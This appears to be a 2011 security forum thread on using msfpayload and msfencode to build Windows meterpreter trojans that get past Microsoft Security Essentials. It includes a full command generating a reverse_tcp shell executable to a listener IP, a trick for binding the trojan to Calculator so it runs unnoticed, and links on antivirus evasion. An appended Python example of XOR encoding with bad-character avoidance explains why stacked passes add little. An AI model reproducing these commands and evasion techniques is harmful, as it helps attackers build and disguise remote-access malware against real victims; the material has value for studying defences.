Title: msfencode Post by: acidicloop on November 29, 2011, 12:39:35 AM

Hello again. I've been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell; however, for the life of me I cannot get it past Microsoft Security Essentials antivirus. No matter what I do, it flags it. My code is this:

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe

I usually run an Apache server and connect to it from the XP machine and download the trojan, or I do shared folders in VM. Any tricks y'all know to bypass Security Essentials? I would think two counts of 10 apiece and shikata_ga_nai would do the trick, but alas it does not.

Title: Re: msfencode Post by: j0rDy on November 29, 2011, 06:59:31 AM

Pff, this is not easy. I'd say you have two options. Now please correct me if I'm wrong, I have no experience with this whatsoever!

The first thing you could do to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. You can use the following parameter for this:

-b  The list of characters to avoid: '\x00\xff'

Another option would be to obfuscate the code or to attach the code to another executable, but I don't have any examples of that. You've probably already seen this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

Title: Re: msfencode Post by: 3xban on November 29, 2011, 07:25:29 AM

I've noticed that MSE is pretty darn good at catching these customized trojans. I had it catch the PDF exploit for CoolType almost instantly. I've had it also pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG). I have no idea why people would be upset with a company who designed an OS to use their own built-in AV. One would think who would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.

Title: Re: msfencode Post by: chrisg on November 29, 2011, 08:13:49 AM

Here are a couple of links that may help:

http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

This thread from the MSF mailing list:
http://mail.metasploit.com/pipermail/framework/2011-April/007630.html

Title: Re: msfencode Post by: cd1zz on November 29, 2011, 09:01:24 AM

Another resource: http://schierlm.users.sourceforge.net/avevasion.html

Title: Re: msfencode Post by: acidicloop on November 29, 2011, 09:57:48 AM

Thanks for the links. Glad to know it's not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? Curious why that wouldn't evade SE, unless, like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran IExpress and made a self-extracting executable by attaching it to Calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too, and under the properties of the trojaned calc it's even signed by Microsoft, lol.
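The thread keeps circling two ideas: j0rDy's -b option (keep bytes like \x00 and \xff out of the encoded output) and acidicloop's question about shikata_ga_nai being polymorphic (a fresh key each run, so the encoded bytes differ every time). The example below is an added illustration written for this page, not code from the thread or from Metasploit: a minimal single-byte XOR encoder that searches for a key satisfying a bad-character list, picks among the valid keys at random so that every run produces different bytes, and applies the pass repeatedly the way -c N does. It is deliberately far simpler than the real encoders (shikata_ga_nai is an additive-feedback XOR with an fnstenv getPC stub, countdown uses a position-dependent key) and omits the x86 decoder stub entirely; that stub is static per encoder and, together with the EXE template the payload is dropped into, is what the scriptjunkie article linked above says signatures actually match. The sample payload bytes are constructed filler, not shellcode.

```python
"""
Added example: single-byte XOR encoding with bad-character avoidance.
Not msfencode's algorithm; the payload bytes are constructed filler.
"""
import secrets
from typing import List, Optional, Tuple

# Constructed sample "payload": arbitrary bytes chosen to contain both 0x00 and 0xff
SAMPLE_PAYLOAD = bytes([0x00, 0x31, 0xC0, 0xFF, 0x50, 0x68,
                        0x00, 0x2F, 0x73, 0x68, 0xFF, 0xE4])

# Equivalent of msfencode -b '\x00\xff'
BAD_CHARS = b"\x00\xff"


def has_bad_chars(buf: bytes, bad_chars: bytes) -> bool:
    """True if any byte of buf appears in the bad-character set."""
    return any(b in bad_chars for b in buf)


def valid_keys(payload: bytes, bad_chars: bytes) -> List[int]:
    """All single-byte XOR keys for which payload ^ key contains no bad chars.

    The key byte itself must also be clean, because a real decoder stub
    embeds it as an immediate operand next to the encoded bytes.
    """
    return [k for k in range(1, 256)
            if k not in bad_chars
            and all((b ^ k) not in bad_chars for b in payload)]


def xor_encode(payload: bytes, bad_chars: bytes,
               key: Optional[int] = None) -> Tuple[int, bytes]:
    """Encode payload with a clean key and return (key, encoded).

    With key=None a valid key is chosen at random, so repeated runs emit
    different bytes for the same payload (the "polymorphic" behaviour).
    """
    keys = valid_keys(payload, bad_chars)
    if not keys:
        raise ValueError("no single-byte XOR key avoids the bad characters")
    if key is None:
        key = secrets.choice(keys)
    elif key not in keys:
        raise ValueError(f"key {key:#04x} produces bad characters")
    return key, bytes(b ^ key for b in payload)


def xor_decode(encoded: bytes, key: int) -> bytes:
    """What the decoder stub would do at run time before jumping to the payload."""
    return bytes(b ^ key for b in encoded)


def encode_iterations(payload: bytes, bad_chars: bytes,
                      count: int) -> Tuple[List[int], bytes]:
    """Apply the encoder `count` times, like msfencode -c N.

    Each pass re-checks the bad-character list on its own output. Returns the
    per-pass keys (outermost last) and the final bytes.
    """
    keys: List[int] = []
    cur = payload
    for _ in range(count):
        k, cur = xor_encode(cur, bad_chars)
        keys.append(k)
    return keys, cur


def combined_key(keys: List[int]) -> int:
    """For plain XOR, N stacked passes collapse to one pass with the XOR of all keys.

    This is why stacking iterations of a trivial encoder adds no real work for
    an analyst: one key recovers the original in a single step.
    """
    k = 0
    for x in keys:
        k ^= x
    return k


if __name__ == "__main__":
    key, enc = xor_encode(SAMPLE_PAYLOAD, BAD_CHARS)
    print(f"key={key:#04x} clean={not has_bad_chars(enc, BAD_CHARS)} "
          f"roundtrip={xor_decode(enc, key) == SAMPLE_PAYLOAD}")
    keys, final = encode_iterations(SAMPLE_PAYLOAD, BAD_CHARS, 10)
    print(f"10 passes -> keys {[hex(k) for k in keys]} "
          f"collapse to {combined_key(keys):#04x}")
```

Running it twice prints a different key each time while every output stays free of 0x00 and 0xff; the last line shows that the ten passes from -c 10 reduce to a single XOR. That is the weak spot to keep in mind when reading the thread: changing the byte transform changes the encoded body, but not the decoder stub or the carrier executable, which is where the signature match in this case most likely lives.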